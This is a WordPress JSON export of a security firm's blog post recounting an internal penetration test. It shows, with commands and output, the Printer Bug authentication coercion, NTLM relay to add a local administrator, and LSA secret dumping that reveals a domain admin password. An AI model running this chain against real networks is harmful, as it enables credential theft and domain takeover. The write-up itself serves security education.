{"id":2948,"date":"2019-08-08T06:45:05","date_gmt":"2019-08-08T05:45:05","guid":{"rendered":"https:\/\/dn-www.azurewebsites.net\/2019\/08\/08\/printer-server-bug-to-domain-administrator\/"},"modified":"2026-03-26T11:01:08","modified_gmt":"2026-03-26T11:01:08","slug":"printer-server-bug-to-domain-administrator","status":"publish","type":"post","link":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/","title":{"rendered":"Printer Server Bug to Domain Administrator"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"2948\" class=\"elementor elementor-2948\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-637497ae elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"637497ae\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-77cef01f\" data-id=\"77cef01f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-254e8ae elementor-widget elementor-widget-text-editor\" data-id=\"254e8ae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>During a recent internal network penetration testing engagement, a number of common attack paths were unavailable as a number of security mechanisms were implemented such as the Local Administrator Password Solution (LAPS) and the prevention of logged on credentials from being cached in memory. Additionally, the estate had a relatively mature patching process, which reduced the chances of exploitable vulnerabilities allowing for remote compromise. Since traditional exploitation techniques and paths such as re-using a built-in local administrator account or passing the hash of a local administrator would not work, more reconnaissance was required to determine other exploitation avenues.<\/p>\r\n\r\n<p>During the reconnaissance phase, BloodHound was used to map the Active Directory domain and a number of SCCM servers were identified which contained computer accounts which were part of a privileged SCCM administrator group. This group was part of the &#8220;Local Administrator&#8221; group on 371 systems throughout the client&#8217;s environment. The screenshot below show this membership relationship, where a computer account is part of the &#8220;SCCM ADMINISTRATOR&#8221; &nbsp;group which has local administrator privileges across 371 hosts:<\/p>\r\n\r\n<p><img decoding=\"async\" alt=\"\" src=\"\/wp-content\/uploads\/files\/sites\/other\/files\/blood_hound_local_admin.PNG\" style=\"width: 500px; height: 230px; border-style: solid; border-width: 1px; border-color: black;\" \/><\/p>\r\n\r\n<p>The screenshot below also shows another view in BloodHound where the &#8220;AdminTo&#8221; path is highlighted from the &#8220;SCCM ADMINISTRATOR&#8221; group to another server, meaning any users which are part of the &#8220;SCCM ADMINISTRATOR&#8221; have administrative privileges on that server:<\/p>\r\n\r\n<p><img decoding=\"async\" alt=\"\" src=\"\/wp-content\/uploads\/files\/sites\/other\/files\/blood_hound_local_admin_cl.PNG\" style=\"width: 500px; height: 230px;border-style: solid; border-width: 1px; border-color: black;\" \/><\/p>\r\n\r\n<p>To exploit this particular configuration, there needed to be a way to gain access to these SCCM server computer accounts which were part of the &#8220;SCCM ADMINISTRATOR&#8221; group. As these SCCM servers were running the print server role, which is used to connect client computers to printers, it was possible to use the &#8220;Printer Bug&#8221; research carried out by Lee Christensen from SpecterOps where he discovered a bug in the printer server allowing any domain user to coerce any remote server to perform NTLM authentication against an attacker controlled system. An example of this is shown below where an attacker with a low privileged domain account can force a server (SCCMLAB.lab.local) running the print server role to connect back to their SMB server (10.191.5.146) using RPC requests, as shown below:<\/p>\r\n\r\n<p>$ python printerbug.py lab.local\/wes:ExampleBl0gPassw0rd! @10.191.6.11 10.191.5.146<\/p>\r\n\r\n<pre>\r\n[*] Attempting to trigger authentication via rprn RPC at 10.191.6.11\r\n\r\n[*] Bind OK\r\n\r\n[*] Got handle\r\n<\/pre>\r\n\r\n<p>As the SCCM server computer accounts are part of the &#8220;Local Administrator&#8221; group on a large number of the systems within this client environment, it was possible to relay the NTLM authentication to log into these systems and perform privileged actions. The following example demonstrates how it was possible to add the user &#8220;wes&#8221; to the &#8220;Local Administrators&#8221; group on another server:<\/p>\r\n\r\n<p>$ ntlmrelayx.py -t 10.191.6.13 -smb2support -c &#8220;net localgroup Administrators LAB\\wes \/ADD&#8221;<\/p>\r\n\r\n<pre>\r\n[*] Servers started, waiting for connections\r\n[*] SMBD-Thread-3: Received connection from 10.191.6.11, attacking target smb:\/\/10.191.6.13\r\n<strong>[*] Authenticating against smb:\/\/10.191.6.13 as LAB\\SCCMLAB$ SUCCEED<\/strong>\r\n[*] SMBD-Thread-5: Received connection from 10.191.6.11, attacking target smb:\/\/10.191.6.13\r\n[...]\r\n[*] Executed specified command on host: 10.191.6.13\r\n<strong>The command completed successfully.<\/strong>\r\n<\/pre>\r\n\r\n<p>Now that the user account &#8220;wes&#8221; is part of the &#8220;Local Administrators&#8221; group on the system above it was then possible to perform various traditional actions when attempting to escalate Active Directory privileges such as retrieving LSA secret information in an attempt to compromise a domain administrator account.<\/p>\r\n\r\n<p>&nbsp;$ cme smb 10.191.6.13 -d LAB -u wes -p ExampleBl0gPassw0rd! \u2013lsa<\/p>\r\n\r\n<pre>\r\nSMB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10.191.6.13&nbsp;&nbsp;&nbsp;&nbsp; 445&nbsp;&nbsp;&nbsp; SCCMServer1&nbsp;&nbsp; [*] Windows 6.3 <strong>Build 9600 x64 (name:SCCMServer1) (domain:LAB) (signing:False)<\/strong> (SMBv1:False)\r\n<strong>SMB&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;10.191.6.13&nbsp;&nbsp;&nbsp;&nbsp; 445&nbsp;&nbsp;&nbsp; SCCMServer1&nbsp;&nbsp; [+] LAB\\wes:E******************!<\/strong>\r\n<strong>SMB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10.191.6.13&nbsp;&nbsp;&nbsp;&nbsp; 445&nbsp;&nbsp;&nbsp; SCCMServer1&nbsp;&nbsp; [+] Dumping LSA secrets<\/strong>\r\n[...]\r\n<strong>SCCMADMIN@LAB.LOCAL:Sup3rStr0ngD0mainAdmin$<\/strong>\r\n<\/pre>\r\n\r\n<p>The LSA secrets registry key on the compromised server contained a clear text password for the &#8220;SCCMADMIN&#8221; account. This account was a local administrator on the domain controllers within the &#8220;LAB&#8221; domain, allowing for privileged tasks such as adding users to the domain administrators group:<\/p>\r\n\r\n<p><img decoding=\"async\" alt=\"\" src=\"\/wp-content\/uploads\/files\/sites\/other\/files\/domain_admin.png\" style=\"width: 400px; height: 202px;\" \/><\/p>\r\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>During a recent internal network penetration testing engagement, a number of common attack paths were unavailable as a number of security mechanisms were implemented such as the Local Administrator Password Solution (LAPS) and the prevention of logged on credentials from being cached in memory. Additionally, the estate had a relatively mature patching process, which reduced [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8717,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[211,209],"class_list":["post-2948","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-researchblog","tag-active_directory","tag-infrastructure","wpbf-post"],"contentshake_article_id":"","yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Printer Server Bug to Domain Administrator<\/title>\n<meta name=\"description\" content=\"Learn how a printer server flaw can lead to domain administrator access, including exploitation techniques, risks, and how to secure your environment.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\" \/>\n<meta property=\"og:locale\" content=\"nl_NL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Printer Server Bug to Domain Administrator\" \/>\n<meta property=\"og:description\" content=\"Learn how a printer server flaw can lead to domain administrator access, including exploitation techniques, risks, and how to secure your environment.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\" \/>\n<meta property=\"og:site_name\" content=\"Dionach\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dionachcyber\" \/>\n<meta property=\"article:published_time\" content=\"2019-08-08T05:45:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-26T11:01:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Dionach Admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:site\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:label1\" content=\"Geschreven door\" \/>\n\t<meta name=\"twitter:data1\" content=\"Dionach Admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Geschatte leestijd\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\"},\"author\":{\"name\":\"Dionach Admin\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8\"},\"headline\":\"Printer Server Bug to Domain Administrator\",\"datePublished\":\"2019-08-08T05:45:05+00:00\",\"dateModified\":\"2026-03-26T11:01:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\"},\"wordCount\":537,\"publisher\":{\"@id\":\"https:\/\/dionach.com\/nl\/#organization\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1\",\"keywords\":[\"active directory\",\"infrastructure\"],\"articleSection\":[\"researchblog\"],\"inLanguage\":\"nl-NL\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\",\"url\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\",\"name\":\"Printer Server Bug to Domain Administrator\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/nl\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1\",\"datePublished\":\"2019-08-08T05:45:05+00:00\",\"dateModified\":\"2026-03-26T11:01:08+00:00\",\"description\":\"Learn how a printer server flaw can lead to domain administrator access, including exploitation techniques, risks, and how to secure your environment.\",\"breadcrumb\":{\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#breadcrumb\"},\"inLanguage\":\"nl-NL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1\",\"width\":800,\"height\":500,\"caption\":\"Printer Server Bug to Domain Administrator\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/dionach.com\/nl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Printer Server Bug to Domain Administrator\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/dionach.com\/nl\/#website\",\"url\":\"https:\/\/dionach.com\/nl\/\",\"name\":\"Dionach\",\"description\":\"Real Security in a Virtual World\",\"publisher\":{\"@id\":\"https:\/\/dionach.com\/nl\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/dionach.com\/nl\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"nl-NL\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/dionach.com\/nl\/#organization\",\"name\":\"Dionach\",\"url\":\"https:\/\/dionach.com\/nl\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"contentUrl\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"width\":512,\"height\":512,\"caption\":\"Dionach\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/dionachcyber\",\"https:\/\/x.com\/dionachcyber\",\"https:\/\/uk.linkedin.com\/company\/dionach-ltd\",\"https:\/\/www.instagram.com\/dionachcyber\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8\",\"name\":\"Dionach Admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"caption\":\"Dionach Admin\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Printer Server Bug to Domain Administrator","description":"Learn how a printer server flaw can lead to domain administrator access, including exploitation techniques, risks, and how to secure your environment.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/","og_locale":"nl_NL","og_type":"article","og_title":"Printer Server Bug to Domain Administrator","og_description":"Learn how a printer server flaw can lead to domain administrator access, including exploitation techniques, risks, and how to secure your environment.","og_url":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/","og_site_name":"Dionach","article_publisher":"https:\/\/www.facebook.com\/dionachcyber","article_published_time":"2019-08-08T05:45:05+00:00","article_modified_time":"2026-03-26T11:01:08+00:00","og_image":[{"width":800,"height":500,"url":"https:\/\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg","type":"image\/jpeg"}],"author":"Dionach Admin","twitter_card":"summary_large_image","twitter_creator":"@dionachcyber","twitter_site":"@dionachcyber","twitter_misc":{"Geschreven door":"Dionach Admin","Geschatte leestijd":"4 minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#article","isPartOf":{"@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/"},"author":{"name":"Dionach Admin","@id":"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8"},"headline":"Printer Server Bug to Domain Administrator","datePublished":"2019-08-08T05:45:05+00:00","dateModified":"2026-03-26T11:01:08+00:00","mainEntityOfPage":{"@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/"},"wordCount":537,"publisher":{"@id":"https:\/\/dionach.com\/nl\/#organization"},"image":{"@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1","keywords":["active directory","infrastructure"],"articleSection":["researchblog"],"inLanguage":"nl-NL"},{"@type":"WebPage","@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/","url":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/","name":"Printer Server Bug to Domain Administrator","isPartOf":{"@id":"https:\/\/dionach.com\/nl\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage"},"image":{"@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1","datePublished":"2019-08-08T05:45:05+00:00","dateModified":"2026-03-26T11:01:08+00:00","description":"Learn how a printer server flaw can lead to domain administrator access, including exploitation techniques, risks, and how to secure your environment.","breadcrumb":{"@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#breadcrumb"},"inLanguage":"nl-NL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/"]}]},{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#primaryimage","url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1","contentUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1","width":800,"height":500,"caption":"Printer Server Bug to Domain Administrator"},{"@type":"BreadcrumbList","@id":"https:\/\/dionach.com\/nl\/printer-server-bug-to-domain-administrator\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/dionach.com\/nl\/"},{"@type":"ListItem","position":2,"name":"Printer Server Bug to Domain Administrator"}]},{"@type":"WebSite","@id":"https:\/\/dionach.com\/nl\/#website","url":"https:\/\/dionach.com\/nl\/","name":"Dionach","description":"Real Security in a Virtual World","publisher":{"@id":"https:\/\/dionach.com\/nl\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dionach.com\/nl\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"nl-NL"},{"@type":"Organization","@id":"https:\/\/dionach.com\/nl\/#organization","name":"Dionach","url":"https:\/\/dionach.com\/nl\/","logo":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/","url":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","contentUrl":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","width":512,"height":512,"caption":"Dionach"},"image":{"@id":"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dionachcyber","https:\/\/x.com\/dionachcyber","https:\/\/uk.linkedin.com\/company\/dionach-ltd","https:\/\/www.instagram.com\/dionachcyber\/"]},{"@type":"Person","@id":"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8","name":"Dionach Admin","image":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","caption":"Dionach Admin"}}]}},"jetpack_featured_media_url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2019\/08\/istock-1061323160.jpg?fit=800%2C500&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/ph4Ojq-Ly","_links":{"self":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2948","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/comments?post=2948"}],"version-history":[{"count":1,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2948\/revisions"}],"predecessor-version":[{"id":27513,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2948\/revisions\/27513"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/media\/8717"}],"wp:attachment":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/media?parent=2948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/categories?post=2948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/tags?post=2948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}